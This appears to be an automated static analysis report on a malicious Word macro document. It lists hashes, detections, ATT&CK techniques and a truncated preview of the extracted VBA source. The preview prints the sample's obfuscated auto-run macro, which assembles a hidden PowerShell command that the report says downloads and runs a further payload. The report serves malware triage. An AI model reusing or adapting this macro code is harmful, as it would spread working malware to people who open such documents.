Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6d981cb83f84894a…

MALICIOUS

Office (OLE)

394.5 KB Created: 2018-07-13 20:09:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: eeafa7799cdd0c188ed39b7077712a07 SHA-1: bcaf9fb9fc2396b4d76fac05e03507fc7835b1b8 SHA-256: 6d981cb83f84894ad7c5bd58e2b410c19e35623dffa50497e8e6016afb3ebf23
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is configured to execute code via the Shell() function, indicating an attempt to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Valyria-6874676-0' further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Malware.Valyria-6874676-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6874676-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 48839 bytes
SHA-256: df8dd97407b1aa12fffc1cca66d32544b79f2103c313f61d54648c874a86f792
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "uqEwBMSRDvsXwm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   vmPJl = (95024 - 3285 / 54662 * jjupM + (9513 + Niwov + 14828 / SEZcV * 38979 / TjSpM))
   mTjOBp = (57689 - 61775 / 7946 * IYPfik + (7143 + ROWbX + 14674 / drsVGL * 17589 / TChodq))
   vNzbA = (540 - 2091 / 24244 * aJaij + (59224 + fwpBYs + 84040 / NiYdEE * 93246 / iIcTf))
   wUhwfj = (75402 - 6240 / 47118 * wNjGL + (91547 + OXzlKz + 70189 / pwcwva * 60593 / iXGqL))
kKrGsrGiiO = Application.Run("ZNHZmYwIdwBR", "" + ImOQYjiY + UwTczEKnawELU + QspEcS + kNfuEN + hjETzf + EmKphipPmJc + MhkCWbNQ + iXsYOdqiG + cANdQ + JjijXrC + osNYcDUs + jjmlGVUXVdU + OACrcM + bSppSpUdc + zNKOsOpzE + RzOmAM + SXnzpmH + pzhNvzM + MOSuwoXzzpjK)
   vTrACb = (13806 - 49732 / 88508 * zZvumF + (17004 + zVMDQ + 25471 / Nshcv * 91340 / zdmsV))
   wSnEjF = (10672 - 32454 / 89907 * twMQXD + (81214 + lKiLNf + 60927 / jsNiNt * 67173 / juIud))
End Sub


Attribute VB_Name = "IcTTiNTnZwp"
Function QspEcS()
On Error Resume Next
wriAa = 10245 * jmGzjf - 73397 + BTzPuW + 72313 - GzBRnS * 75382 + PzOrvl + 80257 * hNQGi
   laCzfv = 11686 * CKwcAY - 77482 + QzYjjQ + 89495 - PdsihG * 58860 + MUQqk + 37709 * nJHLj
   RZdkj = 75146 / WHcYb - baiOsj + CXkkV + (aXWJh * nWiiz - SdZTl + lmnonU / (hntztp / OQMmAw / 90302 / 41965))
SZwDGkOtvk = "" + jtUzHJKvUjOkB + KwjmQfHzIw + "pOw" + acFNrFnJoMGW + ZwKWjGk + "ERs" + OAKtKbvMDQYkTP + iNujwqJlOF + "hEl" + mNkBofqNjMdht + FdRGhrz + "l " + pBwYrZfEPHapf + nYFqRjMqznDHwz + "  " + mHsLmhRVHhZRlZ + FWSImJnIdLA + Chr(34) + " . " + RiElLnhnMIFHj + KuEXZdCajWKd + "((g" + hbjjipwUjamf + NNBCZCwjGcLKPI + "v " + BJNDihZaB + pNilurINTVHD + "'*Md" + wUEUXZpzRZcR + foaAjPIVc + "R*'"
TTXMT = 32055 / XioKO + Yzmis / 80667 / 7629 * IDZBC * 99422 * 48318 / (nFsKQ * bkKjL)
   THvEu = 86915 / vSjNU + dTwsw / 10002 / 17738 * IthfuH * 44817 * 4530 / (crMDES * sXjWWQ)
wrISXqjrvH = "" + OtEhTXtndai + QzLRQAwu + ")." + DwMYCYJiA + ofwUfBfAbRf + "NAME" + KmzSuCW + bAkHzrOUwdu + "[3" + SOwlwSuGAXc + PZrjzitID + ",1" + YBnlHVBaUiTk + DDpZacIw + "1,2" + pcMfPoTPSMM + JziWBqfwoVZ + "]-" + EjdTbbPLviI + fOESJzGX + "jOI"
VviSUY = 24858 / DSFZG + vqmiu / 21474 / 97283 * LaElPO * 46329 * 78116 / (wAPVP * ZCnPNz)
   vGGGG = 60222 / Hnlok + lwkkhU / 26034 / 38976 * ArKQs * 42557 * 23869 / (nCYJhN * VJfuX)
MiNmfPwwD = "" + GFaTtQdK + jDOiIwBOzJZq + "N'')" + DMcGvkmGXvi + EvCTpilfiLTfQ + " ("
NKzAv = 70697 / CrBrXz + XkpJNb / 21494 / 82555 * itcWi * 968 * 20412 / (Lmfrj * QLTvrQ)
   nBCsOh = 12232 / RJEzD + tuidu / 68091 / 54534 * dDFqzQ * 13248 * 7333 / (tIiWzS * vuYIk)
   GuiQKu = 29533 / nWOAzd + SEzKwT / 94384 / 80872 * MJBUBJ * 53182 * 59911 / (BAcNO * tpPPw)
rbOJXvh = "" + TUXKjzWPNWp + TODBhhf + " \" + Chr(34) + wrmYzufUan + JBKqbUoWR + " $(" + dKsEspjAzqwYf + CcktwBUn + "SeT" + sLFMqOCbA + EpmirnBcK + "-itE"
SQSMmY = (46203 * IWirAi + 56544 * IbwzfO + 93210 + mzOFOT) * zkNsp + ibdDKA * 83987 - 42132
   ANztAN = (59379 * EUUaoK + 35601 * oLjGml + 76898 + dzTuVN) * bnKOr + aKmGO * 77869 - 41063
MTzXwjuXRs = "" + TkjLjmsAOZGP + kdqPtmivaMOAwA + "M  '" + STZMzJmBYovKAS + JrVlwGjS + "VAri" + KXzjqrcQHn + ubrorErTuIDDq + "ab" + nzMmGDbwPEr + ijLUUVz + "le:o" + JOcbpdBTuplMoR + jkScckz + "Fs' " + kLziiUHltpzKf + zvKBNqtRQTllfQ + " '" + PWnFREkLVd + cwqDVTfjZzszqt + "')\" + Chr(34) + zjcUbQhos + sKwjjPwpTdhP + Chr(43) + "[sT" + kzSdqPYYWOmB + MOCLNmnWbR + "ri" + sDMlPTRjqQPK + IUokuiIddEaWCY + "nG][" + YAUIWULkz + XdvwrITdSiqW + "Cha"
CwcVu = (59551 * uwGFi + 89841 * wbXWn + 30682 + fwfur) * tjDdOU + CiBDLV * 86310 - 66348
   OaHLs = (31912 * lcrPpt + 43769 * IElbzl + 82 + FiOjvi) * idujIu + YGCrl * 2905 - 8365
   PwpKd = (10646 * cnOsBc + 58313 * zGvJlv + 19578 + uEfiY) * AwdWj + mFUCci * 33950 - 92196
fjIFOYou = "" + ELPDBLuIdmWzwa + MNvdqNBCPZTLS + "R[" + IWmqjWpfsiFq + iEdIcjUbwCq + "]]( 
... (truncated)